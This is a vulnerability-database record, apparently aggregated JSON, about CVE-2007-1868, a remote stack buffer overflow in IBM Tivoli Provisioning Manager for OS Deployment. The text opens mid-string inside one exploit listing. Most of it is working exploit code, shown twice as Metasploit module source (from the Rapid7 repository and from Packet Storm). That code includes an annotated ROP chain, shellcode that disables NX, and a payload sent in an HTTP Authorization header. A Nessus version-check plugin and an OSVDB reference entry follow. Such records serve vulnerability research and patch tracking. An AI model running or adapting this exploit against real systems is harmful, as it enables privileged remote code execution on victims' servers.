ret 6:\r\n\t\t\t# 76a817f0\r\n\t\t\t# pop esi <- 0x76a92a38 (hHeap)\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V')\r\n\t\t\tauth[ 2208, 4 ] = [ 0xffffffff ].pack('V')\r\n\t\t\tauth[ 2212, 4 ] = [ 0x01010101 ].pack('V')\r\n\t\t\tauth[ 2216, 4 ] = [ 0x01010101 ].pack('V')\r\n\t\t\tauth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V')\r\n\r\n\t\t\t# ret 7:\r\n\t\t\t# 76a8190a\r\n\t\t\t# mov [esi], eax <- store new heap in hHeap\r\n\t\t\t# mov eax, esi\r\n\t\t\t# pop esi\r\n\t\t\t# retn 4\r\n\r\n\t\t\tauth[ 2224, 4 ] = [ ib + 0x190a ].pack('V')\r\n\r\n\t\t\t# ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception):\r\n\t\t\t# 76a88a29\r\n\t\t\t# mov eax, [esp+arg_0] <- 0x7fffffa0\r\n\t\t\t# imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400\r\n\t\t\t# push eax\r\n\t\t\t# call _malloc\r\n\t\t\t# pop ecx <- ecx = 0x2400\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V')\r\n\r\n\t\t\t# ret 9:\r\n\t\t\t# 76a8c9ab\r\n\t\t\t# add esp, 0ch\r\n\t\t\t# retn 4\r\n\r\n\t\t\tauth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V')\r\n\t\t\tauth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V')\r\n\t\t\tauth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V')\r\n\r\n\t\t\t# ret 10 (copy payload into heap):\r\n\t\t\t# 76a8c9a0\r\n\t\t\t# push ecx <- 0x2400\r\n\t\t\t# push [esp+8] <- 0x76a91010 (payload in atl.dll data)\r\n\t\t\t# push eax <- heap pointer\r\n\t\t\t# call _memcpy\r\n\t\t\t# add esp, 0ch\r\n\t\t\t# retn\r\n\r\n\t\t\tauth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V')\r\n\r\n\t\t\t# ret 11 (jump into heap)\r\n\t\t\t# 76a815e7\r\n\t\t\t# call eax\r\n\r\n\t\t\tauth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V')\r\n\t\t\tauth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V')\r\n\r\n\t\t\tauth[ 2272, payload.encoded.length ] = payload.encoded\r\n\r\n\t\telse\r\n\t\t\tauth = Rex::Text.rand_text_alphanumeric(2800)\r\n\r\n\t\t\tauth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V')\r\n\t\t\tauth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret\r\n\t\t\tauth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V')\r\n\t\t\tauth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp\r\n\t\t\tauth[ 2108, payload.encoded.length ] = payload.encoded\r\n\r\n\t\tend\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tres = send_request_cgi({\r\n\t\t\t'uri' => '/',\r\n\t\t\t'method' => 'GET',\r\n\t\t\t'headers' =>\r\n\t\t\t{\r\n\t\t\t\t'Authorization' => \"Basic #{auth}\"\r\n\t\t\t}\r\n\t\t}, 5)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16810/"}], "metasploit": [{"lastseen": "2019-04-26T22:32:57", "bulletinFamily": "exploit", "description": "This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager for OS Deployment version 5.1.0.X.", "modified": "2017-07-24T13:26:21", "published": "2007-05-03T20:02:28", "id": "MSF:EXPLOIT/WINDOWS/HTTP/IBM_TPMFOSD_OVERFLOW", "href": "", "type": "metasploit", "title": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow',\n 'Description' => %q{\n This is a stack buffer overflow exploit for IBM Tivoli Provisioning Manager\n for OS Deployment version 5.1.0.X.\n },\n 'Author' => 'toto',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-1868'],\n [ 'OSVDB', '34678'],\n [ 'BID', '23264'],\n [ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n #'Space' => 0x200,\n 'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c&=+?:;-,/#.\\\\$%\\x1a\",\n 'Prepend' =>\n # Disable NX on 2k3 to upload data on the stack\n # (service crashes if the stack is switched to the heap)\n \"\\x64\\x8b\\x0d\\x30\\x00\\x00\\x00\" + # mov ecx, dword ptr fs:[0x30] ; PEB\n \"\\x83\\xb9\\xa4\\x00\\x00\\x00\\x05\" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5\n \"\\x75\\x30\" + # jnz after\n \"\\x83\\xb9\\xa8\\x00\\x00\\x00\\x02\" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2\n \"\\x75\\x27\" + # jnz after\n \"\\x81\\xb9\\xac\\x00\\x00\\x00\\xce\\x0e\\x00\\x00\" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0)\n \"\\x76\\x1b\" + # jbe after\n \"\\x8d\\x89\\xa8\\x00\\x00\\x00\" + # lea ecx, [ecx+0xa8]\n \"\\xba\\x00\\x03\\xfe\\x7f\" + # mov edx, 0x7ffe0300\n \"\\xb8\\xed\\x00\\x00\\x00\" + # mov eax, 0xed\n \"\\x6a\\x04\" + # push 4\n \"\\x51\" + # push ecx\n \"\\x6a\\x22\" + # push 22\n \"\\x6a\\xff\" + # push -1\n \"\\x6a\\xff\" + # push -1 (padding)\n \"\\xff\\x12\", # call dword ptr[edx]\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['TPMfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }],\n # tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll)\n ['TPMfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }],\n ],\n 'DisclosureDate' => 'May 02 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n ])\n end\n\n def exploit\n\n if target.name =~ /2003/\n # the exploit allocates and executable heap to copy and execute the payload\n\n auth = Rex::Text.rand_text_alphanumeric(2800)\n\n ib = target['IB']\n\n auth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash\n\n # ret 1:\n # 76a81a5f:\n # pop esi <- 0x76a91010\n # pop ebx <- 0x76a91010\n # pop ebp <- 0x76a91010\n # retn\n\n auth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V')\n auth[ 2100, 4 ] = [ target['Data'] ].pack('V')\n auth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V')\n auth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V')\n\n # ret 2:\n # 76a817f0:\n # pop esi <- 0x76a81512 (ocscpy pointer)\n # retn\n\n auth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V')\n auth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V')\n\n # ret 3: (copy the payload in atl.dll data)\n # 76a811c8\n # lea eax, [esp+3c] <-- eax points to the payload\n # push eax <- payload\n # push ebp <- 0x76a91010\n # call esi <- ocscpy\n # cmp eax, ebx <- eax == ebx = 0x76a91010\n # jnz before <- jump not taken\n # mov eax, ebp\n # pop edi\n # pop esi\n # pop ebp\n # pop ebx\n # add esp, 1ch\n # retn\n\n auth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V')\n\n\n # ret 4: (increase the stack pointer to allow a jump back in the payload)\n # add esp, 1ch\n # retn\n\n auth[ 2160, 4 ] = [ ib + 0x11da ].pack('V')\n auth[ 2184, 2 ] = \"\\xeb\\x56\" # jmp payload\n\n\n # ret 5: (create an executable heap - huge one)\n # 76a8c0c4\n # jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101)\n\n auth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V')\n\n # ret 6:\n # 76a817f0\n # pop esi <- 0x76a92a38 (hHeap)\n # retn\n\n auth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V')\n auth[ 2208, 4 ] = [ 0xffffffff ].pack('V')\n auth[ 2212, 4 ] = [ 0x01010101 ].pack('V')\n auth[ 2216, 4 ] = [ 0x01010101 ].pack('V')\n auth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V')\n\n # ret 7:\n # 76a8190a\n # mov [esi], eax <- store new heap in hHeap\n # mov eax, esi\n # pop esi\n # retn 4\n\n auth[ 2224, 4 ] = [ ib + 0x190a ].pack('V')\n\n # ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception):\n # 76a88a29\n # mov eax, [esp+arg_0] <- 0x7fffffa0\n # imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400\n # push eax\n # call _malloc\n # pop ecx <- ecx = 0x2400\n # retn\n\n auth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V')\n\n # ret 9:\n # 76a8c9ab\n # add esp, 0ch\n # retn 4\n\n auth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V')\n auth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V')\n auth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V')\n\n # ret 10 (copy payload into heap):\n # 76a8c9a0\n # push ecx <- 0x2400\n # push [esp+8] <- 0x76a91010 (payload in atl.dll data)\n # push eax <- heap pointer\n # call _memcpy\n # add esp, 0ch\n # retn\n\n auth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V')\n\n # ret 11 (jump into heap)\n # 76a815e7\n # call eax\n\n auth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V')\n auth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V')\n\n auth[ 2272, payload.encoded.length ] = payload.encoded\n\n else\n auth = Rex::Text.rand_text_alphanumeric(2800)\n\n auth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V')\n auth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret\n auth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V')\n auth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp\n auth[ 2108, payload.encoded.length ] = payload.encoded\n\n end\n\n print_status(\"Trying target #{target.name}...\")\n\n res = send_request_cgi({\n 'uri' => '/',\n 'method' => 'GET',\n 'headers' =>\n {\n 'Authorization' => \"Basic #{auth}\"\n }\n }, 5)\n\n handler\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb"}], "nessus": [{"lastseen": "2019-02-21T01:09:51", "bulletinFamily": "scanner", "description": "The remote host is running IBM Tivoli Provisioning Manager for OS Deployment. The version of this software contains multiple unspecified memory corruption vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or execute code on the remote host with the privileges of the TPM server.", "modified": "2018-07-12T00:00:00", "id": "IBM_TPMFOSD_CORRUPTION.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25005", "published": "2007-04-07T00:00:00", "title": "IBM Tivoli Provisioning Manager OS Deployment Multiple Unspecified Input Validation Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25005);\n script_version(\"1.15\");\n\n script_cve_id(\"CVE-2007-1868\");\n script_bugtraq_id(23264);\n\n script_name(english:\"IBM Tivoli Provisioning Manager OS Deployment Multiple Unspecified Input Validation Vulnerabilities\");\n script_summary(english:\"Gets IBM TPM for OS Deployment Server version\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running IBM Tivoli Provisioning Manager for OS\nDeployment. The version of this software contains multiple\nunspecified memory corruption vulnerabilities in the HTTP server. \n\nA remote attacker may exploit these flaws to crash the service or\nexecute code on the remote host with the privileges of the TPM server.\" );\n # http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=498\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c482fc38\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Install TPM for OS Deployment FIx Pack 2.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/04/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/04/01\");\n script_cvs_date(\"Date: 2018/07/12 19:01:16\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:ibm:tivoli_provisioning_manager_os_deployment\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"http_version.nasl\");\n script_require_ports(\"Services/www\", 8080, 443);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n\nport = get_http_port(default:8080);\n\nbanner = get_http_banner(port:port);\nif (\"Server: Rembo\" >!< banner)\n exit (0);\n\nw = http_send_recv3(method:\"GET\", item:\"/builtin/index.html\", port:port);\nif (isnull(w)) exit(1, \"the web server did not answer\");\nres = w[2];\n\npat = '<p style=\"font: 12px Verdana, Geneva, Arial, Helvetica, sans-serif;\"><b>TPMfOSd ([0-9]+\\\\.[0-9]+\\\\.[0-9]+\\\\.[0-9]+) \\\\(build [0-9]+\\\\.[0-9]+\\\\)</b>.*';\n\nvers = egrep(pattern:pat, string:res);\nif (!vers)\n exit (0);\n\nvers = ereg_replace(pattern:pat, string:vers, replace:\"\\1\");\nvers = split (vers, sep:\".\", keep:FALSE);\n\nif ( (int(vers[0]) < 5) ||\n (int(vers[0]) == 5 && int(vers[1]) < 1) ||\n (int(vers[0]) == 5 && int(vers[1]) == 1 && int(vers[2]) == 0 && int(vers[3]) < 2) )\n security_hole(port);\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:30", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg24015347)\n[Secunia Advisory ID:24717](https://secuniaresearch.flexerasoftware.com/advisories/24717/)\nOther Advisory URL: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=498\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-04/0025.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0028.html\nFrSIRT Advisory: ADV-2007-1199\n[CVE-2007-1868](https://vulners.com/cve/CVE-2007-1868)\nBugtraq ID: 23264\n", "modified": "2007-03-31T18:49:00", "published": "2007-03-31T18:49:00", "href": "https://vulners.com/osvdb/OSVDB:34678", "id": "OSVDB:34678", "title": "IBM Tivoli Provisioning Manager for OS Deployment multipart/form-data Handling Remote Code Execution", "type": "osvdb", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:43", "bulletinFamily": "exploit", "description": "", "modified": "2009-11-26T00:00:00", "published": "2009-11-26T00:00:00", "href": "https://packetstormsecurity.com/files/83093/IBM-TPM-for-OS-Deployment-5.1.0.x-rembo.exe-Buffer-Overflow.html", "id": "PACKETSTORM:83093", "type": "packetstorm", "title": "IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow', \n'Description' => %q{ \nThis is a stack overflow exploit for IBM Tivoli Provisioning Manager \nfor OS Deployment version 5.1.0.X. \n}, \n'Author' => 'toto', \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-1868'], \n[ 'OSVDB', '34678'], \n[ 'BID', '23264'], \n[ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-05' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 0x200, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c&=+?:;-,/#.\\\\$%\\x1a\", \n'Prepend' => \n# Disable NX on 2k3 to upload data on the stack \n# (service crashes if the stack is switched to the heap) \n\"\\x64\\x8b\\x0d\\x30\\x00\\x00\\x00\" + # mov ecx, dword ptr fs:[0x30] ; PEB \n\"\\x83\\xb9\\xa4\\x00\\x00\\x00\\x05\" + # cmp dword ptr [ecx+0xa4], 5 ; MajorVersion == 5 \n\"\\x75\\x30\" + # jnz after \n\"\\x83\\xb9\\xa8\\x00\\x00\\x00\\x02\" + # cmp dword ptr [ecx+0xa8], 2 ; MinorVersion == 2 \n\"\\x75\\x27\" + # jnz after \n\"\\x81\\xb9\\xac\\x00\\x00\\x00\\xce\\x0e\\x00\\x00\" + # cmp dword ptr [ecx+0xac], 0xece ; BuildVersion (> SP0) \n\"\\x76\\x1b\" + # jbe after \n\"\\x8d\\x89\\xa8\\x00\\x00\\x00\" + # lea ecx, [ecx+0xa8] \n\"\\xba\\x00\\x03\\xfe\\x7f\" + # mov edx, 0x7ffe0300 \n\"\\xb8\\xed\\x00\\x00\\x00\" + # mov eax, 0xed \n\"\\x6a\\x04\" + # push 4 \n\"\\x51\" + # push ecx \n\"\\x6a\\x22\" + # push 22 \n\"\\x6a\\xff\" + # push -1 \n\"\\x6a\\xff\" + # push -1 (padding) \n\"\\xff\\x12\", # call dword ptr[edx] \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n['TMPfOSD 5.1 (Windows 2000 SP4 - English)', { 'Rets' => [0x77bb53af, 0x77bb06f0, 0x75022ac5] }], \n# tested against 5.1.0.1 and 5.1.0.2 (use ATL.Dll) \n['TMPfOSD 5.1 (Windows 2003 All - English)', { 'IB' => 0x76a80000, 'Data' => 0x01061980 }], \n], \n'DisclosureDate' => 'May 02 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(443), \nOptBool.new('SSL', [true, 'Use SSL', true]), \n], self.class ) \nend \n \ndef exploit \n \nif target.name =~ /2003/ \n# the exploit allocates and executable heap to copy and execute the payload \n \nauth = Rex::Text.rand_text_alphanumeric(2800) \n \nib = target['IB'] \n \nauth[ 2080, 4 ] = [ ib + 0x11010 ].pack('V') # store a data to prevent a crash \n \n# ret 1: \n# 76a81a5f: \n# pop esi <- 0x76a91010 \n# pop ebx <- 0x76a91010 \n# pop ebp <- 0x76a91010 \n# retn \n \nauth[ 2096, 4 ] = [ ib + 0x1a5f ].pack('V') \nauth[ 2100, 4 ] = [ target['Data'] ].pack('V') \nauth[ 2104, 4 ] = [ ib + 0x11010 ].pack('V') \nauth[ 2108, 4 ] = [ ib + 0x11010 ].pack('V') \n \n# ret 2: \n# 76a817f0: \n# pop esi <- 0x76a81512 (ocscpy pointer) \n# retn \n \nauth[ 2112, 4 ] = [ ib + 0x17f0 ].pack('V') \nauth[ 2116, 4 ] = [ ib + 0x1512 ].pack('V') \n \n# ret 3: (copy the payload in atl.dll data) \n# 76a811c8 \n# lea eax, [esp+3c] <-- eax points to the payload \n# push eax <- payload \n# push ebp <- 0x76a91010 \n# call esi <- ocscpy \n# cmp eax, ebx <- eax == ebx = 0x76a91010 \n# jnz before <- jump not taken \n# mov eax, ebp \n# pop edi \n# pop esi \n# pop ebp \n# pop ebx \n# add esp, 1ch \n# retn \n \nauth[ 2120, 4 ] = [ ib + 0x11c8 ].pack('V') \n \n \n# ret 4: (increase the stack pointer to allow a jump back in the payload) \n# add esp, 1ch \n# retn \n \nauth[ 2160, 4 ] = [ ib + 0x11da ].pack('V') \nauth[ 2184, 2 ] = \"\\xeb\\x56\" # jmp payload \n \n \n# ret 5: (create an executable heap - huge one) \n# 76a8c0c4 \n# jmp ds:__imp_HeapCreate (0xffffffff, 0x01010101, 0x01010101) \n \nauth[ 2196, 4 ] = [ ib + 0xc0c4 ].pack('V') \n \n# ret 6: \n# 76a817f0 \n# pop esi <- 0x76a92a38 (hHeap) \n# retn \n \nauth[ 2204, 4 ] = [ ib + 0x17f0 ].pack('V') \nauth[ 2208, 4 ] = [ 0xffffffff ].pack('V') \nauth[ 2212, 4 ] = [ 0x01010101 ].pack('V') \nauth[ 2216, 4 ] = [ 0x01010101 ].pack('V') \nauth[ 2220, 4 ] = [ ib + 0x12a38 ].pack('V') \n \n# ret 7: \n# 76a8190a \n# mov [esi], eax <- store new heap in hHeap \n# mov eax, esi \n# pop esi \n# retn 4 \n \nauth[ 2224, 4 ] = [ ib + 0x190a ].pack('V') \n \n# ret 8 (_calloc - needed to allocate a small buffer to prevent a no mem exception): \n# 76a88a29 \n# mov eax, [esp+arg_0] <- 0x7fffffa0 \n# imul eax, [esp+arg_4] <- eax * 0x7fffffa0 = 0x2400 \n# push eax \n# call _malloc \n# pop ecx <- ecx = 0x2400 \n# retn \n \nauth[ 2232, 4 ] = [ ib + 0x8a29 ].pack('V') \n \n# ret 9: \n# 76a8c9ab \n# add esp, 0ch \n# retn 4 \n \nauth[ 2240, 4 ] = [ ib + 0xc9ab ].pack('V') \nauth[ 2244, 4 ] = [ 0x7fffffa0 ].pack('V') \nauth[ 2248, 4 ] = [ 0x7fffffa0 ].pack('V') \n \n# ret 10 (copy payload into heap): \n# 76a8c9a0 \n# push ecx <- 0x2400 \n# push [esp+8] <- 0x76a91010 (payload in atl.dll data) \n# push eax <- heap pointer \n# call _memcpy \n# add esp, 0ch \n# retn \n \nauth[ 2256, 4 ] = [ ib + 0xc9a0 ].pack('V') \n \n# ret 11 (jump into heap) \n# 76a815e7 \n# call eax \n \nauth[ 2264, 4 ] = [ ib + 0x15e7 ].pack('V') \nauth[ 2268, 4 ] = [ ib + 0x11010 ].pack('V') \n \nauth[ 2272, payload.encoded.length ] = payload.encoded \n \nelse \nauth = Rex::Text.rand_text_alphanumeric(2800) \n \nauth[ 2080, 4 ] = [ target['Rets'][1] ].pack('V') \nauth[ 2096, 4 ] = [ target['Rets'][2] ].pack('V') # pop, ret \nauth[ 2100, 4 ] = [ target['Rets'][1] ].pack('V') \nauth[ 2104, 4 ] = [ target['Rets'][0] ].pack('V') # jmp esp \nauth[ 2108, payload.encoded.length ] = payload.encoded \n \nend \n \nprint_status(\"Trying target #{target.name}...\") \n \nres = send_request_cgi({ \n'uri' => '/', \n'method' => 'GET', \n'headers' => \n{ \n'Authorization' => \"Basic #{auth}\" \n} \n}, 5) \n \nhandler \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83093/ibm_tpmfosd_overflow.rb.txt"}]}
